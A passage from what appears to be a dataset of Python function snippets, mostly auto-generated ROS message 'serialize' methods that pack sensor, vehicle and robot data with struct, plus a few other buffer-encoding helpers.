_x.camera_lane.r_lane_type, _x.camera_lane.r_heading_angle, _x.camera_lane.r_lane_mark_color, _x.camera_lane.r_laneQuality, _x.camera_lane.r_laneWidthMarking, _x.camera_lane.r_laneViewRangStart, _x.camera_lane.r_laneViewRangEnd, _x.camera_lane.r_laneCrossing, _x.camera_lane.r_lanePRED_DIST_BASED_EXTRAPOLATION, _x.camera_lane.r_lanePRED_OTHER_SIDE, _x.camera_lane.r_lanePRED_OVERRIDE, _x.camera_lane.r_lanePRED_OCCLUDED_LM_EXTRAPOLATION, _x.camera_lane.r_lanePRED_HEADWAY_ORIENTED, _x.camera_lane.r_lanePRED_SOURCE_DIVERGING_LANES, _x.camera_lane.r_lanePRED_SOURCE_GUARDRAIL_SHADOW, _x.camera_lane.r_lanePRED_SOURCE_HWE_SPAIN, _x.camera_lane.r_lanePRED_SOURCE_STD, _x.camera_lane.r_lanePRED_SOURCE_VRTL_MERGE, _x.camera_lane.r_laneTCL, _x.camera_lane.next_l_laneViewRangStart, _x.camera_lane.next_l_laneViewRangEnd, _x.camera_lane.next_l_numoflaneline, _x.camera_lane.next_l_lanelineid, _x.camera_lane.next_l_lanepositon, _x.camera_lane.next_l_lanecurvature, _x.camera_lane.next_l_lanecurvaturederivative, _x.camera_lane.next_l_lane_type, _x.camera_lane.next_l_heading_angle, _x.camera_lane.next_l_lane_mark_color, _x.camera_lane.next_l_laneQuality, _x.camera_lane.next_l_laneWidthMarking, _x.camera_lane.next_r_laneViewRangStart, _x.camera_lane.next_r_laneViewRangEnd, _x.camera_lane.next_r_numoflaneline, _x.camera_lane.next_r_lanelineid, _x.camera_lane.next_r_lanepositon, _x.camera_lane.next_r_lanecurvature, _x.camera_lane.next_r_lanecurvaturederivative, _x.camera_lane.next_r_lane_type, _x.camera_lane.next_r_heading_angle, _x.camera_lane.next_r_lane_mark_color, _x.camera_lane.next_r_laneQuality, _x.camera_lane.next_r_laneWidthMarking, _x.camera_lane.highwayConstructionArea, _x.camera_lane.highwayRoadType, _x.camera_lane.highwayHighwayExitRight, _x.camera_lane.highwayHighwayExitLeft, _x.camera_lane.highwayProbabilityLeftLane, _x.camera_lane.highwayProbabilityRightLane, _x.camera_lane.highwayDriving_peed_left_lane, _x.camera_lane.highwayDriving_peed_right_lane, _x.camera_lane.highwayprotocol_version))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self.id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.line)\n buff.write(_struct_I.pack(length))\n for val1 in self.line:\n _x = val1\n buff.write(_get_struct_4if().pack(_x.x1, _x.y1, _x.x2, _x.y2, _x.color))\n length = len(self.circle)\n buff.write(_struct_I.pack(length))\n for val1 in self.circle:\n _x = val1\n buff.write(_get_struct_3if().pack(_x.x, _x.y, _x.radius, _x.color))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_f.pack(self.battery_voltage))\n _x = self.flight_mode_ll\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.state_estimation\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.position_control\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_2B2f.pack(_x.serial_interface_enabled, _x.serial_interface_active, _x.flight_time, _x.cpu_load))\n _x = self.motor_status\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.gps_status\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_iBf.pack(_x.gps_num_satellites, _x.have_SSDK_parameters, _x.timesync_offset))\n buff.write(_struct_8H.pack(*self.rc_channel))\n buff.write(_struct_6H.pack(*self.control_axes))\n length = len(self.control_buttons)\n buff.write(_struct_I.pack(length))\n pattern = '<%si'%length\n buff.write(struct.pack(pattern, *self.control_buttons))\n _x = self\n buff.write(_struct_6d.pack(_x.latitude, _x.longitude, _x.altitude, _x.pressure_height, _x.velocity_x, _x.velocity_y))\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_struct_14id2i.pack(_x.lnid, _x.did, _x.blid, _x.flid, _x.bnid, _x.fnid, _x.jct, _x.blid2, _x.blid3, _x.blid4, _x.flid2, _x.flid3, _x.flid4, _x.clossid, _x.span, _x.lcnt, _x.lno))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_struct_2I2d4fh2B.pack(_x.date, _x.time, _x.longitude_RTK, _x.latitude_RTK, _x.height_above_sea_RTK, _x.velocity_north, _x.velocity_east, _x.velocity_ground, _x.yaw, _x.position_flag, _x.yaw_flag))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_h16fh8f().pack(_x.id, _x.age, _x.velocidad_relativa_x, _x.velocidad_relativa_y, _x.velocidad_absoluta_x, _x.velocidad_absoluta_y, _x.velocidad_absoluta_sigma_x, _x.velocidad_absoluta_sigma_y, _x.bounding_box_centro_x, _x.bounding_box_centro_y, _x.bounding_box_largo, _x.bounding_box_ancho, _x.object_box_centro_x, _x.object_box_centro_y, _x.object_box_orientacion, _x.object_box_size_x, _x.object_box_size_y, _x.clasificacion, _x.clasificacion_age, _x.clasificacion_certeza, _x.punto_cercano_x, _x.punto_cercano_y, _x.punto_referencia_x, _x.punto_referencia_y, _x.punto_referencia_sigma_x, _x.punto_referencia_sigma_y))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_6d2IB().pack(_x.position.x, _x.position.y, _x.position.z, _x.position.roll, _x.position.pitch, _x.position.yaw, _x.position.stamp.secs, _x.position.stamp.nsecs, _x.is_Known))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def _encode_message(cls, message):\n if message.magic == 0:\n msg = b''.join([\n struct.pack('>BB', message.magic, message.attributes),\n write_int_string(message.key),\n write_int_string(message.value)\n ])\n crc = crc32(msg)\n msg = struct.pack('>i%ds' % len(msg), crc, msg)\n else:\n raise ProtocolError(\"Unexpected magic number: %d\" % message.magic)\n return msg", "def into_buffer(self, buf, offset):\n self.payload = containerize(exclude_fields(self))\n self.parser = MsgEd25519CertificateDep._parser\n self.stream_payload.reset(buf, offset)\n return self.pack_into(buf, offset, self._build_payload)", "def serialize(self, data):", "def into_buffer(self, buf, offset):\n self.payload = containerize(exclude_fields(self))\n self.parser = MsgCertificateChainDep._parser\n self.stream_payload.reset(buf, offset)\n return self.pack_into(buf, offset, self._build_payload)", "def read_buffer(self):\n message=self._message\n return message", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n length = len(self.actors)\n buff.write(_struct_I.pack(length))\n for val1 in self.actors:\n _v1 = val1.header\n _x = _v1.seq\n buff.write(_get_struct_I().pack(_x))\n _v2 = _v1.stamp\n _x = _v2\n buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))\n _x = _v1.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = val1.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = val1.tracking_id\n buff.write(_get_struct_I().pack(_x))\n _v3 = val1.pose\n _v4 = _v3.pose\n _v5 = _v4.position\n _x = _v5\n buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))\n _v6 = _v4.orientation\n _x = _v6\n buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w))\n buff.write(_get_struct_36d().pack(*_v3.covariance))\n if len(val1.points) != 18:\n self._check_types(ValueError(\"Expecting %s items but found %s when writing '%s'\" % (18, len(val1.points), 'val1.points')))\n for val2 in val1.points:\n _v7 = val2.point\n _x = _v7\n buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))\n _x = val2.confidence\n buff.write(_get_struct_f().pack(_x))\n _v8 = val1.nose_point\n _x = _v8\n buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n buff.write(_get_struct_b().pack(self.error))\n length = len(self.start_pos)\n buff.write(_struct_I.pack(length))\n pattern = '<%sf'%length\n buff.write(struct.pack(pattern, *self.start_pos))\n length = len(self.target_pos)\n buff.write(_struct_I.pack(length))\n pattern = '<%sf'%length\n buff.write(struct.pack(pattern, *self.target_pos))\n length = len(self.plans)\n buff.write(_struct_I.pack(length))\n for val1 in self.plans:\n _x = val1.joint\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(val1.trajectory)\n buff.write(_struct_I.pack(length))\n pattern = '<%sf'%length\n buff.write(struct.pack(pattern, *val1.trajectory))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.polygons)\n buff.write(_struct_I.pack(length))\n for val1 in self.polygons:\n _v1 = val1.stamp\n _x = _v1\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n buff.write(_struct_I.pack(val1.ID))\n buff.write(_struct_6f.pack(*val1.parameter))\n length = len(val1.score)\n buff.write(_struct_I.pack(length))\n for val2 in val1.score:\n _x = val2\n buff.write(_struct_If.pack(_x.ID, _x.prob))\n length = len(val1.polyline)\n buff.write(_struct_I.pack(length))\n for val2 in val1.polyline:\n _x = val2\n buff.write(_struct_3f.pack(_x.x, _x.y, _x.edge_prob))\n length = len(val1.features)\n buff.write(_struct_I.pack(length))\n for val2 in val1.features:\n _x = val2\n buff.write(_struct_3fI.pack(_x.x, _x.y, _x.z, _x.ID))\n _x = val1.energy\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_f.pack(val1.weight))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self.tsp_turtles\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.conveyor_turtle\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.catch_turtle\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n buff.write(_struct_d.pack(self.i))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self\n buff.write(_get_struct_I3f2d13fH().pack(_x.sample_count, _x.ekf_roll, _x.ekf_pitch, _x.ekf_yaw, _x.ekf_lat, _x.ekf_lon, _x.ekf_alt, _x.ekf_vN, _x.ekf_vE, _x.ekf_vD, _x.ekf_vX, _x.ekf_vY, _x.ekf_vZ, _x.rad_gyro_X, _x.rad_gyro_Y, _x.rad_gyro_Z, _x.angular_acc_X, _x.angular_acc_Y, _x.angular_acc_Z, _x.alt_DVL))\n _x = self.dvl_error_code\n length = len(_x)\n # - if encoded as a list instead, serialize as bytes instead of string\n if type(_x) in [list, tuple]:\n buff.write(struct.Struct('<I%sB'%length).pack(length, *_x))\n else:\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self\n buff.write(_get_struct_B9f2i7f().pack(_x.flag_to_check, _x.imu_deg_gyro_X, _x.imu_deg_gyro_Y, _x.imu_deg_gyro_Z, _x.imu_mag_X, _x.imu_mag_Y, _x.imu_mag_Z, _x.imu_acc_X, _x.imu_acc_Y, _x.imu_acc_Z, _x.gps_lat, _x.gps_lon, _x.gps_alt, _x.gps_vN, _x.gps_vE, _x.gps_vD, _x.dvl_vX, _x.dvl_vY, _x.dvl_vZ))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n length = len(self.objects)\n buff.write(_struct_I.pack(length))\n for val1 in self.objects:\n _v1 = val1.header\n buff.write(_struct_I.pack(_v1.seq))\n _v2 = _v1.stamp\n _x = _v2\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = _v1.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.object_class\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_f.pack(val1.confidence))\n _v3 = val1.roi\n _x = _v3\n buff.write(_struct_4IB.pack(_x.x_offset, _x.y_offset, _x.height, _x.width, _x.do_rectify))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_3B.pack(_x.gear, _x.front_diff, _x.rear_diff))\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def send_message(self, proto_buf):\n # print 'sending....'\n #s = message.SerializeToString()\n # packed_len = struct.pack(self.packformat, len(message))\n message = proto_buf.SerializeToString()\n packed_len = str(len(message) + 100000000)\n server_log.debug(\"Sending msg of length: {0}\".format(packed_len))\n self.sock.sendall(packed_len + message)", "def serialize(self, buff):\n try:\n buff.write(_struct_B.pack(self.success))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(_x))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(_x))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_get_struct_I().pack(self.vehicle_id.id))\n _x = self.vehicle_id.description\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_21f().pack(_x.left_size, _x.right_size, _x.front_size, _x.rear_size, _x.min_height, _x.max_height, _x.payload, _x.max_pos_x_vel, _x.max_neg_x_vel, _x.max_pos_x_acc, _x.max_neg_x_acc, _x.max_pos_y_vel, _x.max_neg_y_vel, _x.max_pos_y_acc, _x.max_neg_y_acc, _x.max_pos_ang_vel, _x.max_neg_ang_vel, _x.velocity_control_sensitivity, _x.min_turning_radius, _x.batt_capacity, _x.batt_max_voltage))\n _x = self.vehicle_type\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.vendor\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.action_capability)\n buff.write(_struct_I.pack(length))\n for val1 in self.action_capability:\n _x = val1\n buff.write(_get_struct_2B().pack(_x.category, _x.action))\n length = len(val1.attributes)\n buff.write(_struct_I.pack(length))\n for val2 in val1.attributes:\n _x = val2.type\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.value\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.description\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def _serialize_buffer(buffer, array_serialization=None):\n if array_serialization == 'binary':\n # WARNING: in NumPy 1.9, tostring() has been renamed to tobytes()\n # but tostring() is still here for now for backward compatibility.\n return buffer.ravel().tostring()\n elif array_serialization == 'base64':\n return {'storage_type': 'base64',\n 'buffer': base64.b64encode(buffer).decode('ascii')\n }\n raise ValueError(\"The array serialization method should be 'binary' or \"\n \"'base64'.\")", "def _to_cpp(self, msg):\n buf = BytesIO()\n msg.serialize(buf)\n value = buf.getvalue()\n return value", "def into_buffer(self, buf, offset):\n self.payload = containerize(exclude_fields(self))\n self.parser = MsgEcdsaSignatureDepA._parser\n self.stream_payload.reset(buf, offset)\n return self.pack_into(buf, offset, self._build_payload)", "def _tobuffer(self, object_):\n\n raise NotImplementedError", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self\n buff.write(_get_struct_q6d().pack(_x.control.mode, _x.control.duty_cycle, _x.control.current, _x.control.brake, _x.control.speed, _x.control.position, _x.control.servo))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_12d().pack(_x.sensor_pose_on_robot.position.x, _x.sensor_pose_on_robot.position.y, _x.sensor_pose_on_robot.position.z, _x.sensor_pose_on_robot.orientation.x, _x.sensor_pose_on_robot.orientation.y, _x.sensor_pose_on_robot.orientation.z, _x.sensor_pose_on_robot.orientation.w, _x.min_sensor_distance, _x.max_sensor_distance, _x.sensor_std_range, _x.sensor_std_yaw, _x.sensor_std_pitch))\n length = len(self.sensed_data)\n buff.write(_struct_I.pack(length))\n for val1 in self.sensed_data:\n _x = val1\n buff.write(_get_struct_3di().pack(_x.range, _x.yaw, _x.pitch, _x.id))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_struct_B4bB.pack(_x.sbpl_wait_flag, _x.sbpl_present_x, _x.sbpl_present_y, _x.sbpl_new_x, _x.sbpl_new_y, _x.start_P3DX_motion))\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_Q8d().pack(_x.detection_id, _x.confidence, _x.pose.pose.position.x, _x.pose.pose.position.y, _x.pose.pose.position.z, _x.pose.pose.orientation.x, _x.pose.pose.orientation.y, _x.pose.pose.orientation.z, _x.pose.pose.orientation.w))\n buff.write(_get_struct_36d().pack(*self.pose.covariance))\n _x = self\n buff.write(_get_struct_5d().pack(_x.height, _x.bbox_x, _x.bbox_y, _x.bbox_w, _x.bbox_h))\n _x = self.modality\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.embed_vector)\n buff.write(_struct_I.pack(length))\n pattern = '<%sf'%length\n buff.write(struct.pack(pattern, *self.embed_vector))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_2i16dih().pack(_x.Timestamp_sec, _x.Timestamp_nsec, _x.Roll, _x.Pitch, _x.Yaw, _x.Wx, _x.Wy, _x.Wz, _x.AcelX, _x.AcelY, _x.AcelZ, _x.VelN, _x.VelE, _x.VelZ, _x.GPSLong, _x.GPSLat, _x.GPSAlt, _x.Temp, _x.IMUTime, _x.BITStatus))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.Header.seq, _x.Header.stamp.secs, _x.Header.stamp.nsecs))\n _x = self.Header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self\n buff.write(_get_struct_2hHBI().pack(_x.x_pos, _x.y_pos, _x.angle, _x.code_type, _x.code_num))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_12d2f3d().pack(_x.position.x, _x.position.y, _x.position.z, _x.approach.x, _x.approach.y, _x.approach.z, _x.binormal.x, _x.binormal.y, _x.binormal.z, _x.axis.x, _x.axis.y, _x.axis.z, _x.width.data, _x.score.data, _x.sample.x, _x.sample.y, _x.sample.z))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_B12d.pack(_x.visible, _x.x, _x.y, _x.z, _x.u, _x.v, _x.w, _x.phi, _x.theta, _x.psi, _x.p, _x.q, _x.r))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(_x))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(_x))))", "def serialize(self, buff):\n try:\n _x = self.group\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_2B().pack(_x.rand_start, _x.current_start))\n length = len(self.start_pos)\n buff.write(_struct_I.pack(length))\n pattern = '<%sf'%length\n buff.write(struct.pack(pattern, *self.start_pos))\n buff.write(_get_struct_B().pack(self.rand_target))\n length = len(self.target_pos)\n buff.write(_struct_I.pack(length))\n pattern = '<%sf'%length\n buff.write(struct.pack(pattern, *self.target_pos))\n _x = self\n buff.write(_get_struct_3Bb().pack(_x.execute, _x.wait, _x.ret_plan, _x.ret_fps))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_struct_7q.pack(_x.s_x, _x.s_y, _x.f_x, _x.f_y, _x.step_size, _x.bias_param, _x.max_iteration))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize(self):\n self._messageBuf = bytearray()\n self._writeInt32(self.world.time)\n self._writeBool(self.world.isDay)\n self._writeByte(self.world.moonPhase)\n self._writeBool(self.world.isBloodMoon)\n self._writeInt32(self.world.width)\n self._writeInt32(self.world.height)\n 